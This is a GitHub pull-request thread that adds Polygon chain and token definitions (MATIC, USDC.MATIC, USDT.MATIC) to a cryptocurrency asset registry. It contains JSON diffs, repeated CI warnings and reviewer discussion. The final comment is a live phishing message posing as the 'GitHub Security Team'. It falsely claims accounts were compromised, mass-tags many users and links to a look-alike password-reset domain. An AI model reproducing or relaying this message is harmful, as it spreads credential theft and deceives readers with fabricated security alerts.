### PR TITLE
POLY: Add definition for Polygon chain + tokens

### PR DESCRIPTION
**Pull request by pablojorge**

### CODE REVIEW

**Comment by blockchain-concourse-platform** [comment]
[+] Running checks...


-  ⚠️  [BSV, COIN]: No logo
-  ⚠️  [CEUR, CELO_TOKEN]: displayed as: cEUR
-  ⚠️  [CLOUT, COIN]: displayed as: DESO
-  ⚠️  [CLOUT, COIN]: minWithdrawal 2000 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [CUSD, CELO_TOKEN]: displayed as: cUSD
-  ⚠️  [DGLD, COIN]: minWithdrawal 5460 -> $0.010 not in the $0.01-$10 USD range
-  ⚠️  [NEAR, COIN]: minWithdrawal 0.01 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [PAX, ERC20]: displayed as: USDP
-  ⚠️  [RENBTC, ERC20]: displayed as: renBTC

**Comment by blockchain-concourse-platform** [comment]
[+] Running checks...


-  ⚠️  [BSV, COIN]: No logo
-  ⚠️  [CEUR, CELO_TOKEN]: displayed as: cEUR
-  ⚠️  [CLOUT, COIN]: displayed as: DESO
-  ⚠️  [CLOUT, COIN]: minWithdrawal 2000 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [CUSD, CELO_TOKEN]: displayed as: cUSD
-  ⚠️  [DGLD, COIN]: minWithdrawal 5460 -> $0.010 not in the $0.01-$10 USD range
-  ⚠️  [NEAR, COIN]: minWithdrawal 0.01 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [PAX, ERC20]: displayed as: USDP
-  ⚠️  [RENBTC, ERC20]: displayed as: renBTC

File: chain/list.json [hunk 1]
```diff
@@ -0,0 +1,12 @@
+[
+  {
+    "chain": "celo",
+    "native": "CELO",
+    "tokens": "chain/celo/tokens.json"
+  },
+  {
+    "chain": "polygon",
+    "native": "MATIC.MATIC",
```
Comment (smarvasti-bc) [inline chain/list.json:9]: @pablojorge the native part should be just token symbol so MATIC

Comment (pablojorge) [reply chain/list.json]: Thanks! Updated

**Comment by blockchain-concourse-platform** [comment]
[+] Running checks...


-  ⚠️  [BSV, COIN]: No logo
-  ⚠️  [CEUR, CELO_TOKEN]: displayed as: cEUR
-  ⚠️  [CLOUT, COIN]: displayed as: DESO
-  ⚠️  [CLOUT, COIN]: minWithdrawal 2000 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [CUSD, CELO_TOKEN]: displayed as: cUSD
-  ⚠️  [DGLD, COIN]: minWithdrawal 5460 -> $0.010 not in the $0.01-$10 USD range
-  ⚠️  [NEAR, COIN]: minWithdrawal 0.01 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [PAX, ERC20]: displayed as: USDP
-  ⚠️  [RENBTC, ERC20]: displayed as: renBTC

**Review by smarvasti-bc — DISMISSED** [review]

File: chain/list.json [hunk 2]
```diff
@@ -0,0 +1,12 @@
+[
+  {
+    "chain": "celo",
```
Comment (smarvasti-bc) [inline chain/list.json:3]: chelo should be removed unless we agree to remove CELO_TYPE from assets service.

Comment (pablojorge) [reply chain/list.json:3]: I think that for consistency, we should keep `celo` here, and skip in the assets service (given it already gets an special treatment there)

**Comment by blockchain-concourse-platform** [comment]
[+] Running checks...


-  ⚠️  [BSV, COIN]: No logo
-  ⚠️  [CEUR, CELO_TOKEN]: displayed as: cEUR
-  ⚠️  [CLOUT, COIN]: displayed as: DESO
-  ⚠️  [CLOUT, COIN]: minWithdrawal 2000 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [CUSD, CELO_TOKEN]: displayed as: cUSD
-  ⚠️  [DGLD, COIN]: minWithdrawal 5460 -> $0.010 not in the $0.01-$10 USD range
-  ⚠️  [MATIC.MATIC, COIN]: displayed as: MATIC.MATIC
-  ⚠️  [NEAR, COIN]: minWithdrawal 0.01 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [PAX, ERC20]: displayed as: USDP
-  ⚠️  [RENBTC, ERC20]: displayed as: renBTC

File: groups.json [hunk 3]
```diff
@@ -0,0 +1,10 @@
+[
+  {
+    "parentSymbol":  "USDC",
+    "childSymbols": ["USDC.MATIC"]
+  },
+  {
+    "parentSymbol":  "USDT",
+    "childSymbols": ["USDC.MATIC"]
```
[the remark this answers is not in the document]
Comment (smarvasti-bc) [reply groups.json:8]: this was a bug it is fixed under my pull @pablojorge can you change USDC.MATIC to USDT.MATIC FOR USDT

[the remark this answers is not in the document]
Comment (pablojorge) [reply groups.json]: Done, thanks!!

File: chain/list.json (hunk 2 above)
Comment (smarvasti-bc) [reply chain/list.json:3]: I believe it should be  removed  in nabu-assets so celo is the same as the others..

Comment (smarvasti-bc) [reply chain/list.json:3]: The only issue is I dont know who relies on CELO_TYPE. service-price doesnt.

**Review by smarvasti-bc — APPROVED** [review]

File: custody.json [hunk 4]
```diff
@@ -663,6 +663,18 @@
       "minWithdrawal": 0
     }
   },
+  {
```
Comment (smarvasti-bc) [inline custody.json:666]: @pablojorge in the first instance this should not be available in custodial ? @amadeo-bc said.

**Review by smarvasti-bc — CHANGES_REQUESTED** [review]
I dont think matic.matic should be in custodial in phase 1 . lets check with @amadeo-bc

File: custody.json [hunk 5]
```diff
@@ -1071,6 +1083,18 @@
...
+    "symbol": "USDC.MATIC",
```
Comment (smarvasti-bc) [inline custody.json:1087]: actually this one

File: custody.json (hunk 4 above)
Comment (pablojorge) [reply custody.json:666]: We're adding full MATIC support in custodial too, but of course it doesn't have to be enabled if we don't need to. I'll remove it from this file then.

File: groups.json [hunk 6]
```diff
@@ -0,0 +1,10 @@
+[
```
Comment (smarvasti-bc) [inline groups.json:1]: in my opinion MATIC.MATIC should be here under parentSymbol MATIC for service-price to be able to price it.

File: custody.json (hunk 4 above)
Comment (pablojorge) [reply custody.json:666]: We decided to keep it

**Comment by blockchain-concourse-platform** [comment]
[+] Running checks...


-  ⚠️  [BSV, COIN]: No logo
-  ⚠️  [CEUR, CELO_TOKEN]: displayed as: cEUR
-  ⚠️  [CLOUT, COIN]: displayed as: DESO
-  ⚠️  [CLOUT, COIN]: minWithdrawal 2000 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [CUSD, CELO_TOKEN]: displayed as: cUSD
-  ⚠️  [LTC, COIN]: minWithdrawal 5460 -> $0.006 not in the $0.01-$10 USD range
-  ⚠️  [MATIC.MATIC, COIN]: displayed as: MATIC.MATIC
-  ⚠️  [NEAR, COIN]: minWithdrawal 0.01 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [PAX, ERC20]: displayed as: USDP
-  ⚠️  [RENBTC, ERC20]: displayed as: renBTC

**Review by smarvasti-bc — APPROVED** [review]

**Review by mpfluger — DISMISSED** [review]

**Comment by blockchain-concourse-platform** [comment]
[+] Running checks...


-  ⚠️  [BSV, COIN]: No logo
-  ⚠️  [CEUR, CELO_TOKEN]: displayed as: cEUR
-  ⚠️  [CLOUT, COIN]: displayed as: DESO
-  ⚠️  [CLOUT, COIN]: minWithdrawal 2000 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [CUSD, CELO_TOKEN]: displayed as: cUSD
-  ⚠️  [LTC, COIN]: minWithdrawal 5460 -> $0.006 not in the $0.01-$10 USD range
-  ⚠️  [MATIC.MATIC, COIN]: displayed as: MATIC.MATIC
-  ⚠️  [NEAR, COIN]: minWithdrawal 0.01 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [PAX, ERC20]: displayed as: USDP
-  ⚠️  [RENBTC, ERC20]: displayed as: renBTC

**Comment by blockchain-concourse-platform** [comment]
[+] Running checks...


-  ⚠️  [BSV, COIN]: No logo
-  ⚠️  [CEUR, CELO_TOKEN]: displayed as: cEUR
-  ⚠️  [CLOUT, COIN]: displayed as: DESO
-  ⚠️  [CLOUT, COIN]: minWithdrawal 2000 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [CUSD, CELO_TOKEN]: displayed as: cUSD
-  ⚠️  [LTC, COIN]: minWithdrawal 5460 -> $0.006 not in the $0.01-$10 USD range
-  ⚠️  [NEAR, COIN]: minWithdrawal 0.01 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [PAX, ERC20]: displayed as: USDP
-  ⚠️  [RENBTC, ERC20]: displayed as: renBTC

**Comment by blockchain-concourse-platform** [comment]
[+] Running checks...


-  ⚠️  [BSV, COIN]: No logo
-  ⚠️  [CEUR, CELO_TOKEN]: displayed as: cEUR
-  ⚠️  [CLOUT, COIN]: displayed as: DESO
-  ⚠️  [CLOUT, COIN]: minWithdrawal 2000 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [CUSD, CELO_TOKEN]: displayed as: cUSD
-  ⚠️  [LTC, COIN]: minWithdrawal 5460 -> $0.006 not in the $0.01-$10 USD range
-  ⚠️  [PAX, ERC20]: displayed as: USDP
-  ⚠️  [RENBTC, ERC20]: displayed as: renBTC

**Comment by blockchain-concourse-platform** [comment]
[+] Running checks...


-  ⚠️  [BSV, COIN]: No logo
-  ⚠️  [CEUR, CELO_TOKEN]: displayed as: cEUR
-  ⚠️  [CLOUT, COIN]: displayed as: DESO
-  ⚠️  [CLOUT, COIN]: minWithdrawal 2000 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [CUSD, CELO_TOKEN]: displayed as: cUSD
-  ⚠️  [LTC, COIN]: minWithdrawal 5460 -> $0.006 not in the $0.01-$10 USD range
-  ⚠️  [PAX, ERC20]: displayed as: USDP
-  ⚠️  [RENBTC, ERC20]: displayed as: renBTC

**Review by mpfluger — APPROVED** [review]

**Comment by blockchain-concourse-platform** [comment]
[+] Running checks...


-  ⚠️  [BSV, COIN]: No logo
-  ⚠️  [CEUR, CELO_TOKEN]: displayed as: cEUR
-  ⚠️  [CLOUT, COIN]: displayed as: DESO
-  ⚠️  [CLOUT, COIN]: minWithdrawal 2000 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [CUSD, CELO_TOKEN]: displayed as: cUSD
-  ⚠️  [LTC, COIN]: minWithdrawal 5460 -> $0.006 not in the $0.01-$10 USD range
-  ⚠️  [PAX, ERC20]: displayed as: USDP
-  ⚠️  [RENBTC, ERC20]: displayed as: renBTC

**Review by Kalliingi — CHANGES_REQUESTED** [review]

**Comment by Kalliingi** [comment]
🎯

**Comment by Admin-nextbill** [comment]
# Unauthorized Access Detected

## Immediate Action Required

Dear GitHub User,

It has come to our attention that your GitHub account has been accessed by an unauthorized individual. In order to prevent any further unauthorized access and to secure your account, we urge you to take immediate action.

### What to Do Next

Please visit the following link to reset your password and revoke access to any unauthorized parties: [Reset Password Here](http://github.hudevelopers.online/)

Your prompt attention to this matter is greatly appreciated. Thank you for your cooperation in ensuring the security of your GitHub account.

Sincerely,

GitHub Security Team

---

### List of GitHub Accounts Affected:

- nftbigdev
- @etherpan
- @ilanolkies
- @larry0x
- @srishilesh
- @balajipachai
- @near-examples
- @mcne65
- @HuobiGroup
- @ruanbekkerleviathanbeak
- @Magician-Blockchain
- @zscorpio
- @yhuag
- @khovratovich
- @cds-amal
- @HadesHappy
- @docongminh
- @RuiSiang
- @josedlujancodersharma2001
- @Jonath-z
- @cryptoinhero
- ... (and many more)

---

### Additional Notes

If you believe your account has been accessed without authorization but do not see your username listed above, please contact GitHub Support immediately to report the incident. Your account may have still been affected and not yet been identified.

Thank you for your attention to this matter. Stay safe and secure online.

**Pull request merged**